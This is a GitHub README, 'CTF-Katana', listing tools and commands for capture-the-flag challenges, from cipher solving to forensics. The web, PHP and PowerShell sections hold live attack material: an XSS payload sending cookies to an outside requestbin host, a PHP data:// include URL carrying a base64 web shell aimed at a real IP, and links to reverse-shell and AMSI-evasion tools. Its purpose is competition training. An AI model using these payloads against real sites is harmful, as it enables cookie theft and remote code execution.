This repository aims to hold suggestions (and hopefully/eventually code) for CTF challenges. The "project" is nicknamed Katana.
Go to file
Eshaan Bansal 8aa7c04854
Add stepic under stego
2019-02-27 21:28:30 +05:30
img Added note regarding Ook 2018-10-16 17:45:26 -04:00
README.md Add stepic under stego 2019-02-27 21:28:30 +05:30

README.md

CTF-Katana

John Hammond | February 1st, 2018


This repository, at the time of writing, will just host a listing of tools and commands that may help with CTF challenges. I hope to keep it as a "live document," and ideally it will not die out like the old "tools" page I had made (https://github.com/USCGA/tools).

Hopefully, at some point I will develop software that will run through a lot of the low-hanging fruit and simple command-line tools, generate a report and have all the output in one place.


Esoteric Languages

  • https://tio.run/

    An online tool that has a ton of Esoteric language interpreters.

  • Brainfuck

    This language is easily detectable by its huge use of plus signs, braces, and arrows. There are plenty of online interpreters, like this one: https://copy.sh/brainfuck/ Some example code:

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.--.--------------.+++++++++++++.----.-----------
--.++++++++++++.--------.<------------.<++.>>----.+.<+++++++++++.+++++++++++++.>+++++++++++++++++.-------------
--.++++.+++++++++++++++.<<.>>-------.<+++++++++++++++.>+++..++++.--------.+++.<+++.<++++++++++++++++++++++++++
.<++++++++++++++++++++++.>++++++++++++++..>+.----.>------.+++++++.--------.<+++.>++++++++++++..-------.++.
  • Malboge

    An esoteric language that looks a lot like Base85... but isn't. Often has references to "Inferno" or "Hell" or "Dante." Online interpreters like so: http://www.malbolge.doleczek.pl/ Example code:

(=<`#9]~6ZY32Vx/4Rs+0No-&Jk)"Fh}|Bcy?`=*z]Kw%oG4UUS0/@-ejc(:'8dc
  • Piet

    A graphical programming language... looks like large 8-bit pixels in a variety of colors. Can be interpreted with the tool npiet

https://www.bertnase.de/npiet/hi.png

  • Ook!

    A joke language. Recognizable by . and ?, and !.

Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook! Ook? Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook! Ook! Ook? Ook! Ook? Ook.
Ook! Ook. Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook! Ook? Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook?
Ook! Ook! Ook? Ook! Ook? Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook.

Steganography

  • StegCracker

    Don't ever forget about steghide! This tool can use a password list like rockyou.txt with steghide. SOME IMAGES CAN HAVE MULTIPLE FILED ENCODED WITH MULTIPLE PASSWORDS.

  • steg_brute.py

    This is similar to stegcracker above.

  • openstego

    A Java .JAR tool, that can extract data from an image. A good tool to use on guessing challenges, when you don't have any other leads. We found this tool after the Misc50 challenge from HackIM 2018

  • Stegsolve.jar

    A Java .JAR tool, that will open an image and let you as the user arrow through different renditions of the image (viewing color channels, inverted colors, and more). The tool is surprisingly useful.

  • steghide

    A command-line tool typically used alongside a password or key, that could be uncovered some other way when solving a challenge.

  • stepic

    Python image steganography. Stepic hides arbitrary data inside PIL images. Download it here: http://domnit.org/stepic/doc/

WHEN GIVEN A FILE TO WORK WITH, DO NOT FORGET TO RUN THIS STEGHIDE WITH AN EMPTY PASSWORD!

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSySxHjMFv80XWp74LZpfrnAro6a1MLqeF1F3zpguA5PGSW9ov

  • hipshot

    A Python module to compress a video into a single standalone image, simulating a long-exposure photograph. Was used to steal a QR code visible in a video, displayed through "Star Wars" style text motion.

  • QR code

    A small square "barcode" image that holds data.

  • zbarimg

    A command-line tool to quickly scan multiple forms of barcodes, QR codes included. Installed like so on a typical Ubuntu image:

sudo apt install zbar-tools
  • Punctuation marks !, . and ?

    I have seen some challenges use just the end of . or ? or ! to represent the Ook esoteric programming language. Don't forget that is a thing!

Cryptography

  • Keyboard Shift

    https://www.dcode.fr/keyboard-shift-cipher If you see any thing that has the shape of a sentence but it looks like nonsense letters, and notes some shift left or right, it may be a keyboard shift...

  • Bit Shift

    Sometimes the letters may be shifted by a stated hint, like a binary bit shift ( x >> 1 ) or ( x << 1 ).

  • Reversed Text

    Sometimes a "ciphertext" is just as easy as reversed text. Don't forgot to check under this rock! You can reverse a string in Python like so:

"UOYMORFEDIHOTGNIYRTEBTHGIMFTCATAHTTERCESASISIHT"[::-1]
  • XOR

    ANY text could be XOR'd. Techniques for this are Trey's code, and XORing the data against the known flag format. Typically it is given in just hex, but once it is decoded into raw binary data, it gives it keeps it's hex form (as in \xde\xad\xbe\xef etc..) Note that you can do easy XOR locally with Python like so (you need pwntools installed):

    python >>> import pwn; pwn.xor("KEY", "RAW_BINARY_CIPHER")
    
  • Caesar Cipher

    The most classic shift cipher. Tons of online tools like this: https://www.dcode.fr/caesar-cipher or use caesar as a command-line tool (sudo apt install bsdgames) and you can supply a key for it. Here's a one liner to try all letter positions:

    cipher='jeoi{geiwev_gmtliv_ws_svmkmrep}' ; for i in {0..25}; do echo $cipher | caesar $i; done
    

    Be aware! Some challenges include punctuation in their shift! If this is the case, try to a shift within all 255 ASCII characters, not just 26 alphabetical letters!

  • caesar

    A command-line caesar cipher tool (noted above) found in the bsdgames package.

  • Atbash Cipher

    If you have some text that you have no idea what it is, try the Atbash cipher! It's a letter mapping, but the alphabet is reversed: like A maps to Z, B maps to Y and so on. There are tons of online tools to do this (http://rumkin.com/tools/cipher/atbash.php), and you can build it with Python.

  • Vigenere Cipher

    http://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx, https://www.guballa.de/vigenere-solver and personal Python code here: https://pastebin.com/2Vr29g6J

  • Gronsfeld Cipher

    A variant of the Vignere cipher that uses numbers insteads of letters. http://rumkin.com/tools/cipher/gronsfeld.php

  • Beaufourt Cipher

    https://www.dcode.fr/beaufort-cipher

  • Python random module cracker/predictor

    https://github.com/tna0y/Python-random-module-cracker... helps attack the Mersenne Twister used in Python's random module.

  • Transposition Cipher

  • RSA: Classic RSA

    Variables typically given: n, c, e. ALWAYS try and give to http://factordb.com. If p and q are able to be determined, use some RSA decryptor; handmade code available here: https://pastebin.com/ERAMhJ1v

  • RSA: Multi-prime RSA

  • RSA: e is 3 (or small)

    If e is 3, you can try the cubed-root attack. If you the cubed root of c, and if that is smaller than the cubed root of n, then your plaintext message m is just the cubed root of c! Here is Python code to take the cubed root:

def root3rd(x):
    y, y1 = None, 2
    while y!=y1:
        y = y1
        y3 = y**3
        d = (2*y3+x)
        y1 = (y*(y3+2*x)+d//2)//d
    return y 

Networking

  • Wireshark

    The go-to tool for examining .pcap files.

  • Network Miner

    Seriously cool tool that will try and scrape out images, files, credentials and other goods from PCAP and PCAPNG files.

  • PCAPNG

    Not all tools like the PCAPNG file format... so you can convert them with an online tool http://pcapng.com/ or from the command-line with the editcap command that comes with installing Wireshark:

editcap old_file.pcapng new_file.pcap
  • [tcpflow][tcpflow]

    A command-line tool for reorganizing packets in a PCAP file and getting files out of them. Typically it gives no output, but it creates the files in your current directory!

tcpflow -r my_file.pcap
ls -1t | head -5 # see the last 5 recently modified files
  • PcapXray

    A GUI tool to visualize network traffic.

PHP

  • Magic Hashes

    A common vulnerability in PHP that fakes hash "collisions..." where the == operator falls short in PHP type comparison, thinking everything that follows 0e is considered scientific notation (and therefore 0). More valuable info can be found here: https://github.com/spaze/hashes, but below are the most common breaks.

Plaintext MD5 Hash
240610708 0e462097431906509019562988736854
QLTHNDT 0e405967825401955372549139051580
QNKCDZO 0e830400451993494058024219903391
PJNPDWY 0e291529052894702774557631701704
NWWKITQ 0e763082070976038347657360817689
NOOPCJF 0e818888003657176127862245791911
MMHUWUV 0e701732711630150438129209816536
MAUXXQC 0e478478466848439040434801845361
IHKFRNS 0e256160682445802696926137988570
GZECLQZ 0e537612333747236407713628225676
GGHMVOE 0e362766013028313274586933780773
GEGHBXL 0e248776895502908863709684713578
EEIZDOI 0e782601363539291779881938479162
DYAXWCA 0e424759758842488633464374063001
DQWRASX 0e742373665639232907775599582643
BRTKUJZ 00e57640477961333848717747276704
ABJIHVY 0e755264355178451322893275696586
aaaXXAYW 0e540853622400160407992788832284
aabg7XSs 0e087386482136013740957780965295
aabC9RqS 0e041022518165728065344349536299
Plaintext SHA1 Hash
aaroZmOk 0e66507019969427134894567494305185566735
aaK1STfY 0e76658526655756207688271159624026011393
aaO8zKZF 0e89257456677279068558073954252716165668
aa3OFF9m 0e36977786278517984959260394024281014729
http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index
  • data://text/plain;base64

    A PHP stream that can be taken advantage of if used and evaluated as an include resource or evaluated. Can be used for RCE: check out this writeup: https://ctftime.org/writeup/8868 ... TL;DR:

http://103.5.112.91:1234/?cmd=whoami&page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=

PDF Files

  • pdfinfo

    A command-line tool to get a basic synopsis of what the PDF file is.

  • pdfcrack

    A comand-line tool to recover a password from a PDF file. Supports dictionary wordlists and bruteforce.

  • pdfimages

    A command-line tool, the first thing to reach for when given a PDF file. It extracts the images stored in a PDF file, but it needs the name of an output directory (that it will create for) to place the found images.

  • pdfdetach

    A command-line tool to extract files out of a PDF.

Forensics

  • Magic Numbers

    The starting values that identify a file format. These are often crucial for programs to properly read a certain file type, so they must be correct. If some files are acting strangely, try verifying their magic number with a trusted list of file signatures.

  • hexed.it

    An online tool that allows you to modify the hexadecimal and binary values of an uploaded file. This is a good tool for correcting files with a corrupt magic number

  • dumpzilla

    A Python script to examine a .mozilla configuration file, to examine downloads, bookmarks, history or bookmarks and registered passwords. Usage may be as such:

python dumpzilla.py .mozilla/firefox/c3a958fk.default/ --Downloads --History --Bookmarks --Passwords
  • Repair image online tool

    Good low-hanging fruit to throw any image at: https://online.officerecovery.com/pixrecovery/

  • foremost

    A command-line tool to carve files out of another file. Usage is foremost [filename] and it will create an output directory.

sudo apt install foremost
  • binwalk

    A command-line tool to carve files out of another file. Usage to extract is binwalk -e [filename] and it will create a _[filename]_extracted directory.

	sudo apt install binwalk
  • hachoir-subfile

    A command-line tool to carve out files of another file. Very similar to the other tools like binwalk and foremost, but always try everything!

  • TestDisk

    A command-line tool, used to recover deleted files from a file system image. Handy to use if given a .dd and .img file etc.

PNG File Forensics

  • pngcheck

    A command-line tool for "checking" a PNG image file. Especially good for verifying checksums.

APK Forensics

  • apktool

    A command-line tool to extract all the resources from an APK file. Usage:

apktool d <file.apk>
  • dex2jar

    A command-line tool to convert a J.dex file to .class file and zip them as JAR files.

  • jd-gui

    A GUI tool to decompile Java code, and JAR files.

Web

  • robots.txt

    This file tries to hide webpages from web crawlers, like Google or Bing or Yahoo. A lot of sites try and use this mask sensitive files or folders, so it should always be some where you check during a CTF. http://www.robotstxt.org/

  • Edit This Cookie

    A web browser plug-in that offers an easy interface to modifying cookies. THIS IS OFTEN OVERLOOKED, WITHOUT CHANGING THE VALUE OF THE COOKIES... BE SURE TO FUZZ EVERYTHING, INCLUDING COOKIE VALUES!

  • Backup pages ( ~ and .bak and .swp )

    Some times you may be able to dig up an old version of a webpage (or some PHP source code!) by adding the usual backup suffixes. A good thing to check!

  • /admin/

    This directory is often found by directory scanning bruteforce tools, so I recommend just checking the directory on your own, as part of your own "low-hanging fruits" check.

  • /.git/

    A classic CTF challenge is to leave a git repository live and available on a website. You can see this with nmap -A (or whatever specific script catches it) and just by trying to view that specific folder, /.git/. A good command-line tool for this is GitDumper.sh, or just simply using wget.

    Sometimes you might Bazaar or Mercurial or other distributed version control systems. You can use https://github.com/kost/dvcs-ripper for those!!

  • GitDumper.sh

    A command-line tool that will automatically scrape and download a git repository hosted online with a given URL.

  • Bazaar .bzr

    If you see a publically accessible .bzr directory, you can use bzr branch http://site output-directory to download it. Or, use this utility: https://github.com/kost/dvcs-ripper

  • XSS/Cross-site scripting

    XSS Filter Evasion Cheat Sheet. Cross-site scripting, vulnerability where the user can control rendered HTML and ideally inject JavaScript code that could drive a browser to any other website or make any malicious network calls. Example test payload is as follows:

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
Typically you use this to steal cookies or other information, and you can do this with an online requestbin.
<img src="#" onerror="document.location='http://requestbin.fullcontact.com/168r30u1?c' + document.cookie">
  • CloudFlare Bypass

    If you need to script or automate against a page that uses the I'm Under Attack Mode from CloudFlare, or DDOS protection, you can do it like this with linked Python module.

#!/usr/bin/env python

import cfscrape

url = 'http://yashit.tech/tryharder/'

scraper = cfscrape.create_scraper() 
print scraper.get(url).content 
aws s3 cp --recursive --no-sign-request s3://<bucket_name> .
i. e. `aws s3 cp --recursive --no-sign-request s3://tamuctf .`

Reverse Engineering

  • ltrace and strace

    Easy command-line tools to see some of the code being executed as you follow through a binary. Usage: ltrace ./binary

  • Hopper

  • Binary Ninja

  • gdb

  • IDA

PowerShell

  • nishang

    A PowerShell suite of tools for pentesting. Has support for an ICMP reverse shell!

  • Empire

    HUGE PowerShell library and tool to do a lot of post-exploitation.

  • Bypass AMSI Anti-Malware Scan Interface

    Great tool and guide for anti-virus evasion with PowerShell.

Windows Executables

Python Reversing

Binary Exploitation/pwn

  • Basic Stack Overflow

    Use readelf -s <binary> to get the location of a function to jump to -- overflow in Python, find offset with dmesg, and jump.

  • printf vulnerability

    A C binary vulnerability, where printf is used with user-supplied input without any arguments. Hand-made code to exploit and overwrite functions: https://pastebin.com/0r4WGn3D and a video walkthrough explaining: https://www.youtube.com/watch?v=t1LH9D5cuK4

  • formatStringExploiter

    A good Python module to streamline exploiting a format string vulnerability. THIS IS NOT ALWAYS A GOOD TACTIC...

  • 64-bit Buffer Overflow

    64-bit buffer overflow challenges are often difficult because the null bytes get in the way of memory addresses (for the function you want to jump to, that you can usually find with readelf -s). But, check if whether or not the function address you need starts with the same hex values already on the stack (in rsp). Maybe you only have to write two or three bytes after the overflow, rather than the whole function address.

VisualBasicScript Reversing

Miscellaneous

Base64:
TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz
IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg
dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu
dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLCBleGNlZWRzIHRo
ZSBzaG9ydCB2ZWhlbWVuY2Ugb2YgYW55IGNhcm5hbCBwbGVhc3VyZS4=
Base32
ORUGS4ZANFZSAYLOEBSXQYLNOBWGKIDPMYQGEYLTMUZTELRANF2CA2LTEB3GS43JMJWGKIDCPEQGY33UOMQG6ZRAMNQXA2LUMFWCA3DFOR2GK4TTEBQW4ZBANVXXEZJAMVYXKYLMOMQHG2LHNZZSAZTPOIQHAYLEMRUW4ZZMEBSXQ5DSME======
Base85:
<~9jqo^BlbD-BleB1DJ+*+F(f,q/0JhKF<GL>Cj@.4Gp$d7F!,L7@<6@)/0JDEF<G%<+EV:2F!,
O<DJ+*.@<*K0@<6L(Df-\0Ec5e;DffZ(EZee.Bl.9pF"AGXBPCsi+DGm>@3BB/F*&OCAfu2/AKY
i(DIb:@FD,*)+C]U=@3BN#EcYf8ATD3s@q?d$AftVqCh[NqF<G:8+EV:.+Cf>-FD5W8ARlolDIa
l(DId<j@<?3r@:F%a+D58'ATD4$Bl@l3De:,-DJs`8ARoFb/0JMK@qB4^F!,R<AKZ&-DfTqBG%G
>uD.RTpAKYo'+CT/5+Cei#DII?(E,9)oF*2M7/c~>
  • Base65535

    Unicode characters encoding. Includes a lot of seemingly random spaces and chinese characters!

𤇃𢊻𤄻嶜𤄋𤇁𡊻𤄛𤆬𠲻𤆻𠆜𢮻𤆻ꊌ𢪻𤆻邌𤆻𤊻𤅋𤲥𣾻𤄋𥆸𣊻𤅛ꊌ𤆻𤆱炼綻𤋅𤅴薹𣪻𣊻𣽻𤇆𤚢𣺻赈𤇣綹𤻈𤇣𤾺𤇃悺𢦻𤂻𤅠㢹𣾻𤄛𤆓𤦹𤊻𤄰炜傼𤞻𢊻𣲻𣺻ꉌ邹𡊻𣹫𤅋𤇅𣾻𤇄𓎜𠚻𤊻𢊻𤉛𤅫𤂑𤃃𡉌𤵛𣹛𤁐𢉋𡉻𡡫𤇠𠞗𤇡𡊄𡒌𣼻燉𣼋𦄘炸邹㢸𠞻𠦻𡊻𣈻𡈻𣈛𡈛ꊺ𠆼𤂅𣻆𣫃𤮺𤊻𡉋㽻𣺬𣈛𡈋𤭻𤂲𣈻𤭻𤊼𢈛儛𡈛ᔺ
sudo apt install -y caca-utils
  • Strange Symbols/Characters

    Some CTFs will try and hide a message on a picture with strange symbols. Try and Google Reverse Image searcht these. They may be Egyptian Characters:

http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif

  • Bitcoin

    You might see a private Bitcoin key as a base64 encoded SHA256 hash, like this:

NWEyYTk5ZDNiYWEwN2JmYmQwOGI5NjEyMDVkY2FlODg3ZmIwYWNmOWYyNzI5MjliYWE3OTExZmFhNGFlNzc1MQ==
Decoded, it is a hash: `5a2a99d3baa07bfbd08b961205dcae887fb0acf9f272929baa7911faa4ae7751`.

If you can find an AES ECB key along with (usually represented in hex or another encoding), you can decipher like so:
openssl enc -d -aes-256-ecb -in <(printf %s '5a2a99d3baa07bfbd08b961205dcae887fb0acf9f272929baa7911faa4ae7751' | xxd -r -p) -K '6fb3b5b05966fb06518ce6706ec933e79cfaea8f12b4485cba56321c7a62a077'
MCA{I$love$bitcoin$so$much!}